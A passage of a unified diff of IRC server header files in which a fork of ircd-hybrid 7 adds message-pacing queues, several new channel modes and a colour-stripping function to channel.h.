+/tools.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/vchannel.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/whowas.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/msg.h/1.2/Wed Sep 18 23:19:45 2002//
+/serno.h/1.30/Wed Sep 18 23:19:45 2002//
+D
diff -uNrd ircd-hybrid-7beta5/include/CVS/Repository hybrid7-bg/include/CVS/Repository
--- ircd-hybrid-7beta5/include/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/include/CVS/Repository	Wed Jul 24 18:31:59 2002
@@ -0,0 +1 @@
+hybrid7-bg/include
diff -uNrd ircd-hybrid-7beta5/include/CVS/Root hybrid7-bg/include/CVS/Root
--- ircd-hybrid-7beta5/include/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/include/CVS/Root	Wed Jul 24 18:31:59 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/include/channel.h hybrid7-bg/include/channel.h
--- ircd-hybrid-7beta5/include/channel.h	Mon May 14 06:08:54 2001
+++ hybrid7-bg/include/channel.h	Fri Jul 19 00:21:47 2002
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: channel.h,v 7.69 2001/05/14 10:08:54 toot Exp $
+ * $Id: channel.h,v 1.12 2002/07/19 04:21:47 Administrator Exp $
  */
 
 #include <sys/types.h>        /* time_t */
@@ -43,6 +43,23 @@
   char  key[KEYLEN + 1];
 };
 
+/* used for pacing JOINs, PARTs and PRIVMSGs/NOTICEs to channel
+ *                                                     -demond
+ */
+struct Pace
+{
+  struct Pace *next;
+  int shownames;            /* if nonzero, show names to client on JOIN */
+                            /* buffer len on NICK/QUIT notification */
+  char *text;               /* message text on chanmsg */
+                            /* send buffer on NICK/QUIT notification */
+
+  char nick[NICKLEN+1];     /* nick-originator on JOIN/PART or "command" */
+  char user[HOSTLEN+1];     /* username on JOIN/PART or "butone" on chanmsg */
+  char host[HOSTLEN+1];     /* host on JOIN/PART or originator on chanmsg */
+  char chan[1];
+};
+
 /* channel structure */
 
 struct Channel
@@ -73,6 +90,16 @@
   dlink_list      exceptlist;
   dlink_list      invexlist;
 
+  dlink_list	substlist;
+
+  struct Pace     *joinh, *joint;       /* pace JOIN list head, tail */
+  struct Pace     *parth, *partt;       /* pace PART list head, tail */
+  int             joins, parts;         /* pace counters */
+
+  struct Pace     *msgh, *msgt;         /* pace chanmsg list head, tail */
+  struct Pace     *sendh, *sendt;       /* pace NICK/QUIT list head, tail */
+  int             msgs, sends;          /* pace counters */
+
   time_t          first_received_message_time; /* channel flood control */
   int             received_number_of_privmsgs;
   int             flood_noticed;
@@ -85,6 +112,7 @@
 extern  struct  Channel *GlobalChannelList;
 
 void cleanup_channels(void *);
+void pace_channels(void *);
 
 #define CREATE 1        /* whether a channel should be
                            created or just tested for existence */
@@ -96,7 +124,7 @@
 #define ChannelExists(n)        (hash_find_channel(n, NullChn) != NullChn)
 
 /* Maximum mode changes allowed per client, per server is different */
-#define MAXMODEPARAMS   4
+#define MAXMODEPARAMS   6
 
 extern dlink_node *find_user_link (dlink_list *, struct Client *);
 extern void    add_user_to_channel(struct Channel *chptr,
@@ -152,6 +180,11 @@
 				    struct Channel *chptr,
 				    struct Client *source_p);
 
+extern void add_pace(struct Channel *, struct Client *, char *, int, int);
+extern void add_pace_msg(struct Channel *, struct Client *, struct Client *, char *, char *);
+extern void add_pace_send(struct Channel *, char *, int);
+extern void sendto_chanlists_local(struct Channel *, char *, int);
+
 /*
 ** Channel Related macros follow
 */
@@ -161,27 +194,32 @@
 #define CAN_SEND_NONOP  1
 #define CAN_SEND_OPV	2
 
+#define CAN_SEND_NOTREG 3      /* nonreg nicks cannot send to +M chans */
 
 /* Channel related flags */
 
-#define CHFL_PEON	0x0000 /* normal member of channel */
+#define CHFL_PEON		0x0000 /* normal member of channel */
 #define CHFL_CHANOP     0x0001 /* Channel operator */
 #define CHFL_VOICE      0x0002 /* the power to speak */
 #define CHFL_DEOPPED    0x0004 /* deopped by us, modes need to be bounced */
 #define CHFL_HALFOP     0x0008 /* Channel half op */
 #define CHFL_BAN        0x0010 /* ban channel flag */
 #define CHFL_EXCEPTION  0x0020 /* exception to ban channel flag */
+#define CHFL_SUBST		0x0040
 #define CHFL_INVEX      0x0080
 
 /* Channel Visibility macros */
 
-#define MODE_PEON	CHFL_PEON
+#define MODE_PEON		CHFL_PEON
 #define MODE_CHANOP     CHFL_CHANOP
 #define MODE_VOICE      CHFL_VOICE
-#define MODE_HALFOP	CHFL_HALFOP
+#define MODE_HALFOP		CHFL_HALFOP
 #define MODE_DEOPPED	CHFL_DEOPPED
 
 /* channel modes ONLY */
+#define MODE_REGCHAN    0x0001  /* channel is registered with services */
+#define MODE_REGNICKS   0x0002  /* only registered nicknames can join  */ 
+
 #define MODE_PRIVATE    0x0008
 #define MODE_SECRET     0x0010
 #define MODE_MODERATED  0x0020
@@ -191,10 +229,18 @@
 #define MODE_KEY        0x0200
 #define MODE_BAN        0x0400
 #define MODE_EXCEPTION  0x0800
-#define MODE_INVEX	0x2000
+
+#define MODE_NOCOLOR    0x1000  /* strip mIRC & ANSI color */
+#define MODE_INVEX		0x2000
 #define MODE_HIDEOPS    0x4000
 #define MODE_LIMIT      0x8000  /* was 0x8000 */
 
+#define MODE_REGSPEAK  0x10000  /* only registered nicknames may speak */
+#define MODE_PACE      0x20000  /* pacing JOIN, PART, PRIVMSG and QUIT */
+
+#define MODE_CYRNICKS  0x40000  /* cyrillic nicks are NOT allowed to join */ 
+#define MODE_NOREPEAT  0x80000
+
 /*
  * mode flags which take another parameter (With PARAmeterS)
  */
@@ -221,6 +267,20 @@
 #define SecretChannel(x)        ((x) && ((x)->mode.mode & MODE_SECRET))
 /* channel not shown but names are */
 #define HiddenChannel(x)        ((x) && ((x)->mode.mode & MODE_PRIVATE))
+
+/* colors stripped from chanmsgs, notices, ctcps, quits */
+#define NoColorChannel(x)       ((x) && ((x)->mode.mode & MODE_NOCOLOR))
+
+#define RegNicksOnlyChannel(x)  ((x) && ((x)->mode.mode & MODE_REGNICKS))
+#define RegsMaySpeakChannel(x)  ((x) && ((x)->mode.mode & MODE_REGSPEAK))
+
+#define NoCyrNicksChannel(x)    ((x) && ((x)->mode.mode & MODE_CYRNICKS))
+
+/* we are pacing JOINs, PARTs, PRIVMSGs and QUITs sent to the channel */
+#define PaceChannel(x)			((x) && ((x)->mode.mode & MODE_PACE))
+
+#define NoRepeatChannel(x)		((x) && ((x)->mode.mode & MODE_NOREPEAT))		
+
 /* channel visible */
 #define ShowChannel(v,c)        (PubChannel(c) || IsMember((v),(c)))
 #define PubChannel(x)           ((!x) || ((x)->mode.mode &\
@@ -239,8 +299,29 @@
 } aBan;
 
 #define CLEANUP_CHANNELS_TIME (30*60)
+#define PACE_CHANNELS_TIME 1           /* pace queue flush frequency */
+
 #define MAX_VCHAN_TIME (60*60)
 /* Number of chanops, peon, voiced, halfops sublists */
 #define MAX_SUBLISTS 4
-#endif  /* INCLUDED_channel_h */
+#define MAX_PACEJOIN 100               /* max number of events in pace queue */
+#define MAX_PACEMSG  100
+#define MAX_PACESEND 100
 
+extern char *strip_color(const char *, int);
+
+/*
+ * we don't need this anymore...   -demond
+ *
+#define strip_color(x) if (x) {\
+    char *p = x, *q = x;\
+    if (strchr(x, '\003') || strchr(x, '\033'))\
+      do {\
+        if ((*q == '\003') || (*q == '\033'))\
+          ++q;\
+      }\
+        while (*p++ = *q++);\
+    }
+*/
+
+#endif  /* INCLUDED_channel_h */
diff -uNrd ircd-hybrid-7beta5/include/class.h hybrid7-bg/include/class.h
--- ircd-hybrid-7beta5/include/class.h	Thu Dec 21 15:05:37 2000
+++ hybrid7-bg/include/class.h	Tue Jun  5 12:35:43 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  */
-/* $Id: class.h,v 7.8 2000/12/21 20:05:37 db Exp $ */
+/* $Id: class.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $ */
 
 #ifndef INCLUDED_class_h
 #define INCLUDED_class_h
